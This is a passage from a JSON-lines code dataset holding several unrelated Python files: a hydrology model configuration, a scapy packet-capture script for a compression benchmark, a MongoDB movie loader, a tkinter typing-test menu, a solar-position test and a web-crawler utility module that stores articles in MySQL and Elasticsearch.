calculateUpstreamTotals is True\r\n infiltration_report_rasters_weekly = []\r\n infiltration_report_rasters = []\r\n runoff_report_rasters = []\r\n subsurface_report_rasters = []\r\n # reports of totals (Gxt, Got) only make sense if calculateUpstreamTotals is True\r\n shading_report_rasters = []\r\n surfacestore_report_rasters = []\r\n rainfalleventsfromgammadistribution_report_rasters = []\r\n exchange_report_rasters = []\r\n soilwashMMF_report_rasters = []\r\n regolith_report_rasters = []\r\n bedrockweathering_report_rasters = []\r\n evapotrans_report_rasters = []\r\n evapotranspirationsimple_report_rasters = []\r\n biomassmodifiedmay_report_rasters = []\r\n baselevel_report_rasters = []\r\n creep_report_rasters = []\r\n randomparameters_report_rasters = []\r\n\r\n# TODO - Put the parts below above the reporting for the model components in their respective place, i.e. 
hour/week\r\n# model parts above the EWS stuff, after removal of unnecessary statements.\r\n\r\n######################\r\n# Hourly inputs only #\r\n######################\r\n\r\n# folder with input files (maps, timeseries)\r\ninputFolder = \"inputs_from_weekly\"\r\n\r\n# switch to report for locations as small numpy files\r\n# mainly used for particle filtering\r\ndoReportComponentsDynamicAsNumpy = False\r\n\r\n# switch to swap parameter values between two catchments\r\n# first time users will need to set this to False\r\nswapCatchments = False\r\n\r\n# when True, one can read a set of parameters for all Monte Carlo realizations\r\n# from disk (e.g. representing probability distributions from a calibration)\r\n# first time users should have a False here\r\nreadDistributionOfParametersFromDisk = False\r\n\r\n\r\nwith_shading = True\r\n\r\nif with_shading is False:\r\n fractionReceivedValue = 1.0\r\n fractionReceivedFlatSurfaceValue = 1.0\r\n\r\n\r\nprobabilityOfRainstorm=0.4\r\nrainstormDuration=2\r\nexpectedRainfallIntensity=0.002\r\ngammaShapeParameter=100\r\n\r\n\r\n\r\n\r\n################\r\n# model inputs #\r\n################\r\n\r\n# general ########\r\n\r\n \r\n# set \r\ncloneString = str(pathlib.Path(inputFolder,\"clone.map\"))\r\n\r\n\r\n# report locations, i.e. outflow points, for instance, at the outlet\r\nlocations = str(pathlib.Path(inputFolder, \"clone.map\"))\r\n\r\n\r\n# meteorology #######\r\n\r\n#Deze mogen er ook uit als we evaporatie met simple doen\r\n# airTemperatureDetermString = str(pathlib.Path(inputFolder, \"airTemperatureArnaJulAugSep0506.tss\"))\r\n# relativeHumidityDetermString = str(pathlib.Path(inputFolder, \"relativeHumidityArnasJulAugSep0506.tss\"))\r\n# incomingShortwaveRadiationFlatSurfaceString = str(pathlib.Path(inputFolder, \"incomingShortwaveRadiationArnasJulAugSep0506.tss\"))\r\n# windVelocityDetermString = str(pathlib.Path(inputFolder, \"windVelocityArnasJulAugSep0506.tss\"))\r\n# elevationAboveSeaLevelOfMeteoStationValue = 900.0\r\n\r\n\r\n# interception #######\r\n# maximumInterceptionCapacityValue = mogelijk relevant voor w-model\r\n# leafAreaIndexValue = mogelijk relevant voor w-model\r\n\r\n\r\n# surface storage ######\r\nmaxSurfaceStoreValue = 0.0001 \r\n\r\n\r\n# infiltration #######\r\n\r\n\r\n# regolith geometry ########\r\n# regolithThickness = mogelijk relevant voor w-model \r\n\r\n\r\n#TIJMEN reeds verandert in w-model parameters\r\n# 'groundwater' (saturated flow) ##########\r\nsaturatedConductivityMetrePerDayValue = 12.5 \r\nlimitingPointFractionValue = 0.05\r\nmergeWiltingPointFractionFSValue = 0.019\r\nfieldCapacityFractionValue = 0.22\r\n\r\n# green and ampt\r\n# ksatValue = mogelijk relevant voor w-model\r\ninitialSoilMoistureFractionCFG = 0.22 # (= fieldCapacityFractionValue)\r\nsoilPorosityFractionValue = 0.43\r\n\r\n# evapotranspiration ###########\r\n\r\n# penman\r\n# Physiclly rrelevant, a remnant of old model structure\r\nmultiplierMaxStomatalConductanceValue = 1.0\r\n\r\n\r\n# # Irrelevant bij simple evaporation\r\n# albedoSoil = 0.3\r\n# albedoVeg = 0.2\r\n\r\n\r\n\r\n# real time of first time step, duration of time step\r\n# IMPORTANT NOTE: THIS IS NOW UTC TIME ALMOST CERTAINLY AT LEAST FOR SHADING\r\n# print(\"# IMPORTANT NOTE: THIS IS NOW UTC TIME ALMOST CERTAINLY AT LEAST FOR SHADING\")\r\nstartTimeYearValue = 2005\r\nstartTimeMonthValue = 7\r\nstartTimeDayValue = 1\r\ntimeStepDurationHoursFloatingPointValue = 1.0 # only tested for one hour!!!!\r\n\r\n\r\n# lat long for shading (solar radiation)\r\nlatitudeOfCatchment 
= 52.12833333\r\nlongitudeOfCatchment = 5.19861111\r\ntimeZone = \"Europe/Madrid\"","repo_name":"TijmenJanssen/Pycatch","sub_path":"hourly_configuration.py","file_name":"hourly_configuration.py","file_ext":"py","file_size_in_byte":11014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5059499350","text":"#!/usr/bin/env python2.7\n\nfrom scapy.all import *\nimport time\n\nFILE = \"output_lzo_smb.txt\"\n\nconf.iface6 = 'D-1'\n\ncount = 0\n\nfo = open(FILE, \"w+\")\n\ndef filter_SEG(pkt):\n if IPv6ExtHdrSegment in pkt:\n return 1\n\ndef trigger_count(pkt):\n global count\n count += len(pkt[1])\n fo.write(\"{} {}\\n\".format(pkt[1].fl, len(pkt[1])))\n\nsniff(prn=trigger_count, lfilter=filter_SEG, store=0, iface=conf.iface6)\n\nprint(count)\n","repo_name":"Tycale/SFC-SR","sub_path":"tools/compression_benchmarking/compression_get.py","file_name":"compression_get.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"43844965765","text":"\n## download link: https://raw.githubusercontent.com/prust/wikipedia-movie-data/master/movies.json\n## American Movies Scrapped from America \n\n## JSON contains: title, year, director,cast, genre, and notes\n\n##\n## We imported by importing the json module\n## Then we open the json and used a variable to hold the json contents (this variable is a list)\n## Using insert_many we inserted everything in the list into the database. \n##\n##\n\nimport pymongo, json\nwith open(\"movies.json\", \"r\") as f:\n moviesList = json.load(f)\n\nconnection = pymongo.MongoClient(\"homer.stuy.edu\")\ndb = connection.leiGkalmakovaB \ncollection = db.movies\ncollection.insert_many(moviesList) \n\n\ndef queryTitle(title):\n queryList = collection.find({\"title\": title})\n return queryList\n\ndef queryYear(year):\n queryList = collection.find({\"year\": year})\n s = \"\"\n for each in queryList:\n s = s + each[\"title\"] + \", \" + str(each[\"year\"]) + \"; \"\n return s\n\ndef queryDirector(director):\n queryList = collection.find({\"director\": director})\n return queryList\n\ndef queryGenre(genre):\n queryList = collection.find({\"genre\": genre})\n return queryList\n\n##def queryInclusiveBetweenYears(y1,y2):\n## queryList = []\n## for each in collection.find({\"$and\": [{\"year\":{\"$lte\": y2}}, {\"year\":{\"$gte\": y1}}]}):\n## #print each\n## queryList.extend(each)\n## return queryList\n\n##queryTitle(\"After Dark in Central\")\n##queryYear(1900)\n##queryDirector(\"James H. 
White\")\n##queryGenre(\"Short\")\n##queryInclusiveBetweenYears(1900,1902)\n","repo_name":"BermetKalmakova/06flask","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18364855363","text":"from tkinter import ttk, constants\n\nfrom services.user_service import user_service\n\nclass MenuView:\n def __init__(self, root, handle_logout_view, handle_new_typing_test_view, handle_user_statistics_view):\n \n self._root = root\n self._handle_logout_view = handle_logout_view\n self._handle_new_typing_test_view = handle_new_typing_test_view\n self._handle_user_statistics_view = handle_user_statistics_view\n\n self._frame = None\n\n self._initialize()\n\n def pack(self):\n self._frame.pack(fill = constants.X)\n\n def destroy(self):\n self._frame.destroy()\n\n def _initialize(self):\n\n self._root.geometry(\"300x200\")\n self._frame = ttk.Frame(master = self._root)\n self._frame.grid_rowconfigure(0, weight=1)\n self._frame.grid_columnconfigure(0, weight=1)\n \n self._initialize_header()\n self._initialize_start_typing_test_button()\n self._initialize_statistics_button()\n self._initialize_logout_button()\n\n def _initialize_header(self):\n\n username = user_service.get_current_user().username\n\n header = ttk.Label(master = self._frame,\n text = f\"Logged in as {username}\",\n font = ('consolas', 13, 'bold'))\n\n header.grid(column=0, row=0, padx = 5, pady = 5)\n\n def _initialize_start_typing_test_button(self):\n\n typing_test_button = ttk.Button(master = self._frame,\n text = \"Start a typing test\",\n command = self._handle_new_typing_test_view,\n width = 200)\n\n typing_test_button.grid(column = 0, row = 1, padx = 5, pady = 5)\n\n def _initialize_statistics_button(self):\n\n statistics_button = ttk.Button(master = self._frame,\n text = \"Statistics\",\n command = self._handle_user_statistics_view,\n width = 200)\n\n statistics_button.grid(column = 0, row = 2, padx = 5, pady = 5)\n\n def _initialize_logout_button(self):\n\n logout_button = ttk.Button(master = self._frame,\n text = \"Logout\",\n command = self._handle_logout,\n width = 200)\n\n logout_button.grid(column = 0, row = 3, padx = 5, pady = 5)\n\n def _handle_logout(self):\n\n user_service.logout()\n self._handle_logout_view()","repo_name":"schmaigul/ot-harjoitustyo","sub_path":"TypingTest/src/ui/menu_view.py","file_name":"menu_view.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37264873457","text":"from datetime import datetime,timedelta\nimport pysolar.solar as ps\nimport ephem\n\ngatech = ephem.Observer(); gatech.lat, gatech.lon = '40.88', '-72.87'\nsun,moon=ephem.Sun(), ephem.Moon()\nsun.compute(gatech)\nmoon.compute(gatech)\nprint(ps.get_altitude(40.88,-72.87,datetime.now()))\nprint(\"%s %s\" % (sun.alt, sun.az))\nprint(\"%s %s\" % (moon.alt, moon.az))","repo_name":"BNL-NowCasting/SolarForecasting","sub_path":"code/stereo/test_ephem.py","file_name":"test_ephem.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"3421119883","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time :2019/6/17 9:58\n# @Author :zhai shuai\n\"\"\"\n 作用\n 一: 辅助工具类,\n 二: 功能函数都是写在这个文本里面\n 难点\n 注意点\n\"\"\"\nimport configparser, os, requests, json,re,time,logging,datetime,shutil\nfrom bs4 import 
BeautifulSoup\nfrom elasticsearch import helpers\nimport uuid\n\ndef unsubscribeArticles(readerPanelListSorted,sess,websiteurl) :\n \"\"\"\n 取消文章的订阅\n :param readerPanelListSorted: 传入的list,格式是 [{id:文章的url},{id:文章的url},.....]\n :return:\n \"\"\"\n articleIds = []\n for temp in readerPanelListSorted :\n articleIds.append(temp[\"id\"])\n articleIds = \"[\\\"\" + \"\\\",\\\"\".join(articleIds) + \"\\\"]\"\n mydata = {\n 'xjxfun': 'read_article',\n 'xjxargs[]': articleIds\n }\n\n requests.post(websiteurl, data=mydata,cookies=sess.cookies)\n\n\"\"\"\n ###################CrawlArticle####存的下需要的函数###############################################\n\"\"\"\ndef readConfig(config, section):\n \"\"\"\n 读取配置文件的信息\n :param config: 哪个配置文件\n :param section: 配置文件的section\n :return:\n \"\"\"\n configDir = \"/config/\"\n \"\"\"\n :param section: 想要获取哪个文件的配置信息\n :param section: 想要获取某个配置文件的哪部分的配置信息,如果mysql,es等配置信息\n :return: 返回该配置的字典\n \"\"\"\n root_dir = os.path.dirname(os.path.abspath('.')) # 获取当前文件所在目录的上一级目录\n cf = configparser.ConfigParser()\n cf.read(root_dir + configDir + config) # 拼接得到requestHeader.ini文件的路径,直接使用\n if section != False:\n options = cf.items(section) # 获取某个section名为Mysql-Database所对应的键\n return dict(options) # 转成dict\n else:\n return cf\n\ndef getBuiltTreeJsonData(sess,username,password,websiteurl):\n cf = readConfig(\"requestHeader.ini\", False)\n headerJson = {\n \"referer\":str(websiteurl)+\"/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\"\n }\n\n loginUrl = str(websiteurl)+\"/login\"\n\n warp_action = cf.get(\"login-user-info\", \"warp_action\")\n remember_me = cf.get(\"login-user-info\", \"remember_me\")\n params = {\n \"username\": username,\n \"password\": password,\n \"warp_action\": warp_action,\n \"remember_me\": remember_me\n }\n # 创建向登录页面发送POST请求的Request\n sess.post(loginUrl, data=params, headers=headerJson)\n\n mydata = {\n 'xjxfun': 'build_tree'\n }\n\n myresponse = requests.post(websiteurl, data=mydata, cookies=sess.cookies)\n return myresponse\n\n\ndef createArticleStoreLocalDir(articleStoreDir):\n \"\"\"\n 得到存储文章的本地目录\n \"\"\"\n cf = readConfig(\"requestHeader.ini\", False)\n articleStoreLocalDir = mainUrl = cf.get(\"article-storelocaldir\", \"articlestorelocaldir\")\n\n localDir = articleStoreLocalDir+articleStoreDir+\"/\"\n if not os.path.exists(localDir):\n os.makedirs(localDir)\n return localDir\n\ndef analyseTreeBuiltJsonData(builtTreeJson):\n \"\"\"\n 解析出订阅信息,\n (1)如果没有订阅,则json.loads(jsonStr.content).get('xjxobj')[1]['data'] 的返回值是:\n (2)如果有订阅,则返回的数据要远大于这些��符串\n :param jsonStr: 浏览器返回的信息\n :return:\n \"\"\"\n channelInfo = json.loads(builtTreeJson.content).get('xjxobj')[1]['data']\n return True if len(channelInfo) > 20 else False\n\n\n\ndef getPrintArticlesJsonData(sess,websiteurl):\n \"\"\"\n 返回 未读文章信息(订阅频道的未读文章)\n 注意:返回的对象实际上是json信息,里面含有未读文章信息\n \"\"\"\n cf = readConfig(\"requestHeader.ini\", False)\n mydata = {\n 'xjxfun': 'print_articles'\n }\n myresponse = requests.post(websiteurl, data=mydata, cookies=sess.cookies)\n return myresponse\n\ndef analyseReaderPanel(printArticlesHtml,websiteurl) :\n \"\"\"\n 得到文章的url信息和文章的id,把它组成一个list,组成一个[{id:文章的url},{id:文章的url},.....]的形式\n :return:\n \"\"\"\n articleUrlPrefix = str(websiteurl)+\"/article/\"\n soup = BeautifulSoup(printArticlesHtml, 'lxml')\n readerPanels = soup.select('div[data-oid]')\n\n listTotal = []\n for temp in readerPanels :\n singleMap = {\"id\":temp['data-aid'],\"url\":articleUrlPrefix+temp['data-oid']}\n 
listTotal.append(singleMap)\n return listTotal\n\n\ndef analyseArticlesLoaded(articlesLoadedHtml,username) :\n \"\"\"\n 用于解析文章,它的解析\n 得到文章的url信息和文章的id, 把它组成一个list, 组成一个[{\"id\":id的值,\"htmltext\":\"文章html的内容\"}, {\"id\":id的值,\"htmltext\":\"文章html的内容\"},.....]\n :param articlesLoadedHtml:\n :return:\n \"\"\"\n listTotal = []\n articleContent = articlesLoadedHtml[0]\n for temp in articleContent.items():\n id = temp[0]\n htmltext = temp[1]\n soup = BeautifulSoup(htmltext, 'lxml')\n articleUrl = soup.find(\"div\", attrs={\"class\": \"header_buttons\"}).find(\"a\")[\"href\"]\n articleTitle = soup.select(\".article_title_link\")[0].text.strip()\n articlePublicDate = analyseSingleArticlePublicDate(soup)\n articleAuthor = analyseSingleArticleAuthor(soup)\n articleChannel = analyseSingleArticleChannel(soup)\n articleId = str(uuid.uuid1())\n singleMap = {\n \"articleUrl\":articleUrl,\n \"articleTitle\":articleTitle,\n \"articlePublicDate\":articlePublicDate,\n \"articleAuthor\":articleAuthor,\n \"articleId\":articleId,\n \"username\":username,\n \"articlechannel\":articleChannel,\n \"id\":id\n }\n listTotal.append(singleMap)\n return listTotal\n\n\ndef storeFileToLocal(articlesLoadedListSorted,articleStoreLocalDir):\n # 把每篇文章写入本地目录文件\n for temp in articlesLoadedListSorted:\n if \"articleContent\" in temp: #判断本篇文章是否取到了内容,如果没有取得内容,就不存入本地目录\n articleContent = temp['articleContent']\n articleId = temp['articleId']\n f = open(articleStoreLocalDir + articleId + \".html\", \"w\", encoding=\"utf-8\")\n f.write(str(articleContent))\n f.close()\n\n\ndef storeFileToMysqlVerifyDuplicate(articles24LoadedListSorted,articleStoreLocalDir,mysqlConn):\n \"\"\"\n 把数据插入到mysql数据库中,这个是方法验证了数据的重复性\n \"\"\"\n cur = mysqlConn.cursor();\n insertSql = \"insert into webcrawlerfilelist(id,articleurl,articledir,articletitle,articleauthor,publicdate,iscrawler,username,articlechannel)\" \\\n \" values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n querySql = \"select count(id) from webcrawlerfilelist where articleurl=(%s)\"\n for temp in articles24LoadedListSorted:\n articleLocalDir = articleStoreLocalDir + temp['articleId'] + \".html\" if \"articleContent\" in temp else \"\"\n cur.execute(querySql,(temp['articleUrl']))\n queryResultRowNum =cur.fetchone()[0]\n if not queryResultRowNum:\n cur.execute(\n insertSql,\n (temp['articleId'],temp['articleUrl'],articleLocalDir,temp['articleTitle'],\n temp['articleAuthor'],temp['articlePublicDate'],temp['isCrawler'],temp['username'],temp['articlechannel'])\n )\n # 进行提交,批量插入数据,没有提交的话,无法完成插入\n mysqlConn.commit()\n\ndef analyseNewArticles(sess,websiteurl,username,mysqlConn):\n \"\"\"\n 查看是否有新的文章,如果有新文章就返回[{\"id\":id的值,\"htmltext\":\"文章html的内容\"}],如果没有新的文章就返回False\n :param printArticleJson:\n :return:\n \"\"\"\n printArticleInfo = getPrintArticlesJsonData(sess,websiteurl) #得到全部PrintArticles信息\n printArticleInfo = json.loads(printArticleInfo.content).get('xjxobj')\n\n articlesLoadedHtml = '' #得到{cmd: \"jc\", func: \"articles_loaded\",…} 这一项的信息\n\n for tempNum in range(len(printArticleInfo)) :\n if articlesLoadedHtml != '':\n break\n if 'func' in printArticleInfo[tempNum] :\n if 'check_older_articles_hint' == printArticleInfo[tempNum]['func'] : #如果有这个方法名,则表明所有的频道下面没有最新的文章\n return False\n if 'articles_loaded' == printArticleInfo[tempNum]['func'] :\n articlesLoadedHtml = printArticleInfo[tempNum]['data']\n articlesLoadedList = analyseArticlesLoaded(articlesLoadedHtml,username)\n articlesLoadedList = getArticleContent(articlesLoadedList,mysqlConn);\n return articlesLoadedList\n\n\"\"\"\n 
###################AnalyseArticle####存的下需要的函数###############################################\n\"\"\"\n\ndef analyseSingleArticlePublicDate(soupObj) :\n \"\"\"\n 解析文章发表时间 日期有两种格式,\n 一个是 %a %b %d, %Y %H:%M 接收日期: Thu Jun 13, 2019 16:32 发布日期: Sun Jun 02, 2019 16:12\n 一个是:%H:%M 接收日期: 09:17 发布日期: 09:09\n :param soupObj:\n :return:\n \"\"\"\n articleTime = soupObj.find(\"div\", attrs={\"class\": \"header_date\"}).attrs['title']\n searchObj = articleTime.split(\": \")\n publicDate = searchObj[2]\n if (re.search(r'^\\d{2}:\\d{2}', publicDate)):\n strTime = time.strftime(\"%Y-%m-%d \") + publicDate\n else:\n timeStruct = time.strptime(publicDate, \"%a %b %d, %Y %H:%M\")\n strTime = time.strftime(\"%Y-%m-%d %H:%M\", timeStruct)\n\n return strTime\n\ndef queryAnalyseData(mysqlConn):\n # 使用cursor()方法获取操作游标\n cursor = mysqlConn.cursor()\n\n # SQL 查询语句\n sql = \"select id,articleurl,articledir,updatedate,articletitle,articleauthor,publicdate,iscrawler from webcrawlerfilelist where articleflag=-3\"\n usersvalues = []\n try:\n # 执行SQL语句\n cursor.execute(sql)\n # 获取所有记录列表\n results = cursor.fetchall()\n #把results这些数据的articleflag=-2表明它正在处理\n for temp in range(0, len(results)):\n usersvalues.append((-2, results[temp][0]))\n cursor.executemany('update webcrawlerfilelist set articleflag =%s where id =%s',usersvalues)\n mysqlConn.commit() # 没有提交的话,无法完成插入\n except:\n print (\"Error: unable to fecth data\")\n return results\n\ndef analyseSingleArticleAuthor(soup):\n textauthor = soup.find(\"span\", attrs={\"class\": \"article_author\"}).text\n textauthor = textauthor.replace(\" \", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n\n author = re.findall(r\"(.*)由(.*)新增规则\", textauthor)\n if len(author) ==0:\n author = re.findall(r\"(.*)by(.*)Createrule\", textauthor)\n if author:\n author = author[0][1]\n else:\n author = \"\"\n return author\n\ndef analyseArticleDate(fetchAll):\n \"\"\"\n 分析文章\n :param fetchAll:\n :return:\n \"\"\"\n dataList = [];\n insertTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n for row in fetchAll:\n articleurl = row[1]\n articledir = row[2]\n articletitle = row[4]\n articleauthor = row[5]\n publicdate = str(row[6])\n iscrawler = row[7]\n finalEsContent = analyseSingleArticle(articledir,iscrawler)\n if iscrawler == 1:\n singleMap = {\"title\": articletitle, \"author\": articleauthor,\n \"url\": articleurl, \"articledir\": articledir,\n \"publicDate\": publicdate, \"insertDate\": insertTime,\n \"analyseFlag\": \"false\", \"content\": finalEsContent,\"iscrawler\":iscrawler}\n dataList.append(singleMap)\n return dataList\n\n\ndef analyseSingleArticle(articledir,iscrawler):\n \"\"\"\n 分析一篇文章的内容,这里只分析文章的内容\n :param articledir: 传入该篇文章的本地存储目录,爬虫标识\n :return:\n \"\"\"\n finalEsContent = \"\"\n if iscrawler == 1:\n f = open(articledir, \"r\", encoding=\"utf-8\")\n articleContent = f.read()\n soup = BeautifulSoup(articleContent,\"html5lib\")\n [s.extract() for s in soup([\"script\", \"style\", \"svg\"])] # 去除这些指定的标签,因为对于文章内容来说这些是没有用的\n finalEsContent += \"\".join([s for s in soup.get_text().splitlines(True) if s.strip()])\n f.close()\n return finalEsContent\n\ndef importDataToEs(esConn,articleListData,fetchAll,mysqlConn,es_index,es_type):\n actions = [\n {\n \"_index\": es_index,\n \"_type\": es_type,\n '_source': d\n }\n for d in articleListData\n ]\n\n # 批量插入\n try:\n helpers.bulk(esConn, actions)\n except Exception as e:\n print(e.args)\n\n # 把results这些数据的articleflag=-1表明它正在处理\n usersvalues = []\n for temp in range(0, len(fetchAll)):\n usersvalues.append((-1, 
fetchAll[temp][0]))\n mysqlConn.cursor().executemany('update webcrawlerfilelist set articleflag =%s where id =%s', usersvalues)\n mysqlConn.commit() # 没有提交的话,无法完成插入\n\n\ndef createLog():\n cf = readConfig(\"requestHeader.ini\", False)\n log_path = cf.get(\"logger\", \"loggerDir\")\n # 第一步,创建一个logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO) # Log等级总开关\n # 第二步,创建一个handler,用于写入日志文件\n rq = time.strftime('%Y%m', time.localtime(time.time()))\n log_name = log_path + rq + '.log'\n logfile = log_name\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n fh = logging.FileHandler(logfile, mode='a', encoding=\"utf-8\")\n fh.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n # 第三步,定义handler的输出格式\n formatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\n fh.setFormatter(formatter)\n # 第四步,将logger添加到handler里面\n logger.addHandler(fh)\n return logger\n\n\ndef queryUsers(mysqlConn):\n \"\"\"\n 获取所有的用户\n :param mysqlConn: mysql连接\n :return:\n \"\"\"\n cur = mysqlConn.cursor();\n querySql = \"select username,password,websiteurl,websitename from webcrawlerusers\"\n cur.execute(querySql)\n results = cur.fetchall()\n return results\n\ndef deleteMysqlArticle(mysqlConn):\n \"\"\"\n 每天删除mysql三天前已经成功的数据\n :param mysqlConn:\n :return:\n \"\"\"\n cur = mysqlConn.cursor();\n beforeThreeDay = datetime.date.today() + datetime.timedelta(-6)\n sql = 'delete from webcrawlerfilelist where updatedate < STR_TO_DATE(%s,%s) and articleflag = %s'\n cur.execute(sql,[beforeThreeDay,'%Y-%m-%d',-1])\n mysqlConn.commit()\n\ndef deleteLocalDirArticle():\n \"\"\"\n 每天删除本地存储文件当中三天前数据\n :return:\n \"\"\"\n beforeThreeDay = datetime.date.today() + datetime.timedelta(-7)\n cf = readConfig(\"requestHeader.ini\", False)\n localFileDir = cf.get(\"article-storelocaldir\", \"articlestorelocaldir\")\n removeDir = localFileDir+str(beforeThreeDay)\n if os.path.exists(removeDir):\n shutil.rmtree(removeDir)\n\ndef getArticleContent(articlesLoadedList,mysqlConn):\n \"\"\"\n 该方法是取得每篇文章的文章内容\n :param articlesLoadedList: 这个是一个列表list\n :return:\n \"\"\"\n\n #开启文章的过滤,如果是特定频道(不能抓取的频道,就不让它尝试抓取了)\n #excludeChannel = getExcludeChannel(mysqlConn)\n\n #开启文章的过滤\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36 LBBROWSER'\n }\n for temp in articlesLoadedList:\n articleUrl = temp[\"articleUrl\"]\n try:\n response = requests.get(articleUrl,timeout=80,headers=headers)\n if response.status_code == 200:\n temp[\"isCrawler\"] = 1\n temp[\"articleContent\"] = response.content.decode(\"utf-8\")\n else:\n temp[\"isCrawler\"] = 2\n except Exception:\n temp[\"isCrawler\"] = 3\n\n return articlesLoadedList\n\ndef analyseSingleArticleChannel(soup):\n \"\"\"\n 分析一篇文章的频道\n :param soup:\n :return:\n \"\"\"\n channel = \"\"\n tag = soup.find(\"a\", attrs={\"class\": \"boldlink boldlink ajaxed\"})\n if tag:\n channel = tag.text\n return channel\n\ndef retryCrawler(mysqlConn,articleStoreLocalDir):\n \"\"\"\n 对于初次不能爬取的文章,我们再去尝试去爬取\n :param mysqlConn:\n :param articleStoreLocalDir:\n :return:\n \"\"\"\n querySql = \"select id,articleurl,iscrawler,articlechannel from webcrawlerfilelist where iscrawler in (2,3) and articleflag=-3\"\n cur = mysqlConn.cursor()\n cur.execute(querySql)\n results = cur.fetchall()\n\n retryList = tupleToList(results)#tuple转成list\n retryList = getArticleContent(retryList,mysqlConn)#再次去请求网络\n retryUpdateArticleContent(mysqlConn,retryList,articleStoreLocalDir)#更新本地文件和数据库\n\n\ndef 
tupleToList(result):\n \"\"\"\n 把tuple 转换成list\n :param result:\n :return:\n \"\"\"\n list = []\n for temp in result:\n single = {\n \"id\":temp[0],\n \"articleUrl\":temp[1],\n \"isCrawler\":temp[2],\n \"articlechannel\":temp[3]\n }\n list.append(single)\n return list\n\ndef retryUpdateArticleContent(mysqlConn,retryList,articleStoreLocalDir):\n \"\"\"\n 更新再次请求的数据\n :param retryList:\n :return:\n \"\"\"\n cur = mysqlConn.cursor()\n updateSql = \"update webcrawlerfilelist set articledir=%s,iscrawler=%s where id=%s\"\n for temp in retryList:\n if \"articleContent\" in temp:\n #把文章内容写入文件\n localdir = articleStoreLocalDir + temp[\"id\"] + \".html\"\n f = open(localdir, \"w\", encoding=\"utf-8\")\n f.write(str(temp['articleContent']))\n f.close()\n #更新数据库\n cur.execute(updateSql,(localdir, temp['isCrawler'], temp['id']))\n mysqlConn.commit()\n\n\ndef getExcludeChannel(mysqlConn):\n \"\"\"\n 查询常见的不能抓取的频道名称\n :param mysqlConn:\n :return:\n \"\"\"\n sql = \"select channelname from excludechannel\"\n # 执行SQL语句\n cursor = mysqlConn.cursor()\n cursor.execute(sql)\n # 获取所有记录列表\n results = cursor.fetchall()\n #把元组转成list\n resultList = []\n for temp in results:\n resultList.append(temp[0])\n return resultList;\n\ndef createEsIndex(esConn,es_index,es_type):\n \"\"\"\n 创建es索引\n :param esConn:\n :param es_index:\n :param es_type:\n :return:\n \"\"\"\n\n if not esConn.indices.exists(index=es_index):\n CREATE_BODY = {\n \"settings\": {\n \"number_of_shards\": 5,\n \"number_of_replicas\": 1\n },\n \"mappings\": {\n es_type: {\n \"properties\": {\n \"analyseFlag\": {\n \"type\": \"keyword\"\n },\n \"articledir\": {\n \"type\": \"keyword\"\n },\n \"author\": {\n \"type\": \"text\",\n \"analyzer\": \"ik_max_word\",\n \"fields\": {\n \"keyword\": {\n \"type\": \"keyword\",\n \"ignore_above\": 256\n }\n }\n },\n \"content\": {\n \"type\": \"text\",\n \"analyzer\": \"ik_max_word\"\n },\n \"insertDate\": {\n \"type\": \"keyword\"\n },\n \"iscrawler\": {\n \"type\": \"long\"\n },\n \"publicDate\": {\n \"type\": \"keyword\"\n },\n \"title\": {\n \"type\": \"text\",\n \"analyzer\": \"ik_max_word\",\n \"fields\": {\n \"keyword\": {\n \"type\": \"keyword\",\n \"ignore_above\": 500\n }\n }\n },\n \"url\": {\n \"type\": \"text\",\n \"fields\": {\n \"keyword\": {\n \"type\": \"keyword\",\n \"ignore_above\": 500\n }\n }\n }\n }\n }\n }\n }\n esConn.indices.create(index=es_index, body=CREATE_BODY)\n\ndef addChannelData(mysqlConn):\n \"\"\"\n 向频道表中插入数据\n :param mysqlConn: mysql连接\n :return:\n \"\"\"\n reg = \"(http|https)://[^\\s]*?/\" #提取到三级域\n cursor = mysqlConn.cursor()\n # 存放当天的数据\n currdayList = []\n # 数据库中所有的数据\n databaseList = []\n # 新增数据\n insertData = []\n # 从当天的数据当中筛选url,只查找能拉取下来的数据\n articleStoreDir = time.strftime('%Y-%m-%d', time.localtime(time.time()));\n queryStr = \"select articleurl from webcrawlerfilelist where DATE_FORMAT(updatedate,'%Y-%m-%d')='\" + articleStoreDir + \"' and iscrawler=1\"\n insertSql = \"insert into channellist(channelurl) values(%s)\"\n cursor.execute(queryStr)\n currdayresults = cursor.fetchall()\n if currdayresults:\n for temp in currdayresults:\n url = re.match(reg, temp[0]).group()\n currdayList.append(url)\n currdayList = list(set(currdayList)) # 对list数据进行去重\n # 从channellist表当中查询出所有的数据\n queryStr = \"select channelurl from channellist\"\n cursor.execute(queryStr)\n databaseresults = cursor.fetchall()\n if databaseresults:\n for temp in databaseresults:\n databaseList.append(temp[0])\n\n # 插入数据\n if currdayList:\n for temp in currdayList:\n if temp not in databaseList:\n 
